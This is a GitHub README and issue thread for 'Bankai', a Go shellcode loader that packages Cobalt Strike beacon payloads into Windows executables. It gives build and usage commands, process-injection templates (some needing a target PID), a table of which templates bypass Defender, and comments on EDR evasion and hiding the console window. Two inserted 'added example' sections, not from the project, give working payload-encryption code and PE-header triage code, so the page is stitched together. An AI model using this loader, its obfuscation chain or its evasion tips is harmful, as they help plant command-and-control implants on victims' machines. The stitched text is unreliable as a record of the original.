Bankai

Another Go shellcode loader designed to work with Cobalt Strike raw binary payload. I created this project mainly to teach myself Go and the various techniques for executing shellcode directly on a target Windows system.

Encryption - I implemented a simple payload encryption process (IV --> AES --> XOR --> Base64) that I learned while studying for SLAE32. This is mainly to protect the Cobalt Strike payload while it is moved over to the target host. The final compiled payload includes the matching decrypt function.
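As an added example (not Bankai's own code), here is the chain described above implemented and reversed in Go: a random IV is prepended, the blob is AES-encrypted, XORed and Base64-encoded, and Unwrap undoes each layer in reverse. The README does not state the AES mode or the XOR key, so CTR mode, a single-byte XOR key and the IV-prefix layout are assumptions made for this example; the 32-byte key is the one printed in the README's example run, and the input bytes are a constructed placeholder. The point worth noting from the analysis side: Unwrap is exactly what the decrypt function compiled into the output binary has to execute, so the key and XOR constant necessarily ship inside that binary. The layering obscures the blob in transit; it does not protect it once a sample has been recovered.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
)

// xorKey is an assumed single-byte XOR key (placeholder); the README does not
// document Bankai's real XOR layer.
const xorKey byte = 0x5A

// xorBytes applies a repeating single-byte XOR; it is its own inverse.
func xorBytes(b []byte, k byte) []byte {
	out := make([]byte, len(b))
	for i, c := range b {
		out[i] = c ^ k
	}
	return out
}

// Wrap applies the layered chain: random IV prepended, AES-CTR (assumed mode),
// XOR, then Base64. key must be 16, 24 or 32 bytes long.
func Wrap(plain, key []byte) (string, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	body := make([]byte, aes.BlockSize+len(plain))
	iv := body[:aes.BlockSize]
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return "", err
	}
	cipher.NewCTR(block, iv).XORKeyStream(body[aes.BlockSize:], plain)
	return base64.StdEncoding.EncodeToString(xorBytes(body, xorKey)), nil
}

// Unwrap reverses the chain. This is what the decrypt routine compiled into the
// output binary has to do at runtime, which is why the key must be present in
// that binary and can be recovered from a captured sample.
func Unwrap(wrapped string, key []byte) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(wrapped)
	if err != nil {
		return nil, err
	}
	body := xorBytes(raw, xorKey)
	if len(body) < aes.BlockSize {
		return nil, errors.New("wrapped blob shorter than one AES block")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv, ct := body[:aes.BlockSize], body[aes.BlockSize:]
	out := make([]byte, len(ct))
	cipher.NewCTR(block, iv).XORKeyStream(out, ct)
	return out, nil
}

// RoundTrips reports whether Unwrap(Wrap(data)) returns data unchanged.
func RoundTrips(data, key []byte) (bool, error) {
	w, err := Wrap(data, key)
	if err != nil {
		return false, err
	}
	got, err := Unwrap(w, key)
	if err != nil {
		return false, err
	}
	return bytes.Equal(got, data), nil
}

func main() {
	// 32-byte key as printed by the README's example run (AES-256 key length).
	key := []byte("SymE9GQBtyHL4IAq5Pm6r3b8I7PJB9l0")
	// Constructed placeholder bytes standing in for the input file; not a payload.
	data := []byte("placeholder input bytes for the wrapping demo")
	ok, err := RoundTrips(data, key)
	fmt.Println("round trip ok:", ok, "err:", err)
}
```

CTR was chosen over CBC only because it needs no padding and keeps the example short; if a sample turns out to use a different mode or a multi-byte XOR key, only the two cipher lines and xorBytes change.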

Templates - Templates are the skeleton scripts used to generate the final payload for each technique.

Installation

git clone https://github.com/bigb0sss/bankai.git
GO111MODULE=off go build bankai.go

Usage & Example

Generate a Cobalt Strike payload:



./bankai -h                       

     _                 _         _ 
    | |               | |       (_)
    | |__   __ _ _ __ | | ____ _ _ 
    | '_ \ / _' | '_ \| |/ / _' | |
    | |_) | (_| | | | |   < (_| | |
    |_.__/ \__,_|_| |_|_|\_\__,_|_|
                        [bigb0ss]

    [INFO] Another Go Shellcode Loader

 
    Required:
    -i            Binary File (e.g., beacon.bin)
    -o            Payload Output (e.g, payload.exe)
    -t            Payload Template (e.g., win32_VirtualProtect.tmpl)
    -a            Arch (32|64)
    
    Optional:
    -h            Print this help menu
    -p            PID

    Templates:                                        Last update: 06/07/21
    +--------------------------------------+-----------+------------------+
    | Techniques                           | PID       | Bypass Defender  |
    +--------------------------------------+-----------+------------------+
    | win32_VirtualProtect.tmpl            |           |        No        |
    +--------------------------------------+-----------+------------------+
    | win64_CreateFiber.tmpl               |           |        No        |
    +--------------------------------------+-----------+------------------+
    | win64_CreateRemoteThreadNative.tmpl  | Required  |        Yes       | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateThread.tmpl              |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_EtwpCreateEtwThread.tmpl       |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_Syscall.tmpl                   |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateThreadpoolWait.tmpl      |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_EnumerateLoadedModules.tmpl    |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_EnumChildWindows.tmpl          |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateRemoteThread.tmpl        | Required  |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_RtlCreateUserThread.tmpl       | Required  |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateThreadNative.tmpl        |           |        No        | 
    +--------------------------------------+-----------+------------------+

    Example:

    ./bankai -i beacon.bin -o payload.exe -t win64_CreateThread.tmpl -a 64
    [INFO] Key: SymE9GQBtyHL4IAq5Pm6r3b8I7PJB9l0
    [INFO] AES encrpyting the payload...
    [INFO] Arch: x64 (64-bit)
    [INFO] Template: win64_CreateThread.tmpl
    [INFO] InputFile: beacon.bin
    [INFO] OutputFile: payload.exe

    ./bankai -i beacon64.bin -o payload.exe -t win64_CreateRemoteThread.tmpl -a 64 -p 7720
    [INFO] Key: 3mOL2Ne5XIW4xCieiR7cPmHtw4o737Do
    [INFO] AES encrpyting the payload...
    [INFO] Arch: x64 (64-bit)
    [INFO] Template: win64_CreateRemoteThread.tmpl
    [INFO] InputFile: beacon64.bin
    [INFO] OutputFile: payload.exe

Credits / Acknowledgments / References

All of the work is inspired by and based on the following researchers/projects:

Todo

  • Add more shellcode injection technique templates
  • Add AlternativeShellcodeExec techniques that Ali and Alfaro found
  • Test these shellcodes with modified malleableC2 profiles

Change Log

06/02/21
  • Added win64_CreateThreadpoolWait.tmpl
  • Added win64_EnumerateLoadedModules.tmpl
  • Added win64_EnumChildWindows.tmpl
  • Updated some error handling
06/07/21
  • Added win64_EnumPageFilesW.tmpl
  • Added win64_CreateRemoteThread.tmpl
  • Added win64_RtlCreateUserThread.tmpl
  • Added win64_CreateThreadNative.tmpl
Owner
bigb0ss
OSWE | OSCE | OSCP | Offensive Security Consultant Pentesting, RedTeam, ExpDev, Application Security
Comments
  • Bug Fix: Line 131 is missing }

    According to the deployment tutorial you provided, an error occurred (see attached image). After debugging, it was found that the loop at line 128 was missing a `}`, so I added a `}` on line 131.

  • [Feature Enhancement] BananaPhone

    This is worth adding as a template mate:

    https://github.com/C-Sto/BananaPhone

    "It's a go variant of Hells gate! (directly calling windows kernel functions, but from Go!)" It will help with evading EDR.

  • [Bug] Console window visible

    You can fix this by adding a compiler flag. See updated code below:

    	cmd := exec.Command(
    		"go",
    		"build",
    		// go build keeps only the last -ldflags value given, so the three
    		// linker flags must be passed as one value: -s omits the symbol
    		// table, -w omits DWARF debug info, -H=windowsgui selects the GUI
    		// subsystem so no console window is created.
    		"-ldflags=-s -w -H=windowsgui",
    		"-o", outputFile,
    		"output/shellcode.go",
    	)
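An added example from the triage side, not code from Bankai or from the comment author: the two linker settings discussed in this comment leave visible traces in the PE header, and the standard debug/pe package reads both. The Subsystem field of the optional header is 2 (WINDOWS_GUI) when a Go binary was linked with -H=windowsgui and 3 (WINDOWS_CUI) otherwise, and the COFF symbol table is absent (NumberOfSymbols is 0) when -s was used. The helper below reports those facts for a binary loaded from memory. The PE header it parses is constructed inside the code so the example runs offline; it is a code-free header, not a real executable. TriagePE, Triage and buildMinimalPE are names introduced here.

```go
package main

import (
	"bytes"
	"debug/pe"
	"encoding/binary"
	"errors"
	"fmt"
)

// Subsystem values from the PE specification, defined locally so the example
// does not depend on a particular Go release exporting them.
const (
	imageSubsystemWindowsGUI uint16 = 2 // what -ldflags=-H=windowsgui sets
	imageSubsystemWindowsCUI uint16 = 3 // default for a Windows go build
)

// Triage holds the header facts worth recording for a Go-built PE.
type Triage struct {
	Subsystem  uint16
	Console    bool     // true when running the binary would open a console window
	HasSymbols bool     // false when built with -s (COFF symbol table omitted)
	Sections   []string // section names, e.g. .text, .rdata, .data
}

// TriagePE parses a PE image held in memory and extracts the fields above.
func TriagePE(data []byte) (Triage, error) {
	f, err := pe.NewFile(bytes.NewReader(data))
	if err != nil {
		return Triage{}, err
	}
	defer f.Close()

	var sub uint16
	switch oh := f.OptionalHeader.(type) {
	case *pe.OptionalHeader64:
		sub = oh.Subsystem
	case *pe.OptionalHeader32:
		sub = oh.Subsystem
	default:
		return Triage{}, errors.New("PE has no optional header")
	}
	t := Triage{
		Subsystem:  sub,
		Console:    sub == imageSubsystemWindowsCUI,
		HasSymbols: f.NumberOfSymbols > 0,
	}
	for _, s := range f.Sections {
		t.Sections = append(t.Sections, s.Name)
	}
	return t, nil
}

// buildMinimalPE constructs a bare, code-free PE32+ header with the requested
// Subsystem value. It is a constructed sample so the check can run offline; it
// has no sections or entry point and is not a loadable executable.
func buildMinimalPE(subsystem uint16) []byte {
	const peOff, fhOff, ohOff, ohSize = 0x40, 0x44, 0x58, 240
	buf := make([]byte, ohOff+ohSize)
	copy(buf, "MZ")
	binary.LittleEndian.PutUint32(buf[0x3c:], peOff) // e_lfanew -> "PE\0\0"
	copy(buf[peOff:], "PE\x00\x00")
	binary.LittleEndian.PutUint16(buf[fhOff+0:], 0x8664)  // Machine: AMD64
	binary.LittleEndian.PutUint16(buf[fhOff+16:], ohSize) // SizeOfOptionalHeader
	binary.LittleEndian.PutUint16(buf[fhOff+18:], 0x0022) // EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
	binary.LittleEndian.PutUint16(buf[ohOff+0:], 0x20b)   // PE32+ magic
	binary.LittleEndian.PutUint16(buf[ohOff+68:], subsystem)
	binary.LittleEndian.PutUint32(buf[ohOff+108:], 16) // NumberOfRvaAndSizes (all zero)
	return buf
}

func main() {
	for _, sub := range []uint16{imageSubsystemWindowsGUI, imageSubsystemWindowsCUI} {
		t, err := TriagePE(buildMinimalPE(sub))
		fmt.Printf("subsystem=%d console=%v symbols=%v sections=%v err=%v\n",
			t.Subsystem, t.Console, t.HasSymbols, t.Sections, err)
	}
}
```

On a real file, replace buildMinimalPE with the bytes read from disk; a GUI-subsystem binary with no symbol table and no console-related imports is the header profile the comment's build flags produce, which is a useful pivot when sorting Go executables during an investigation.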
    
  • [Bug] -p flag broken if statement

    You can fix the if statement with the below:

    	// && binds tighter than ||, so each template name is paired with its own
    	// pid check; the parentheses and the closing brace make that explicit.
    	if (opt.templates == "win64_CreateRemoteThreadNative.tmpl" && opt.pid == 0) ||
    		(opt.templates == "win64_CreateRemoteThread.tmpl" && opt.pid == 0) ||
    		(opt.templates == "win64_RtlCreateUserThread.tmpl" && opt.pid == 0) {
    		fmt.Println("[ERROR] For this template, you must use PID (-p).")
    		os.Exit(1)
    	}
    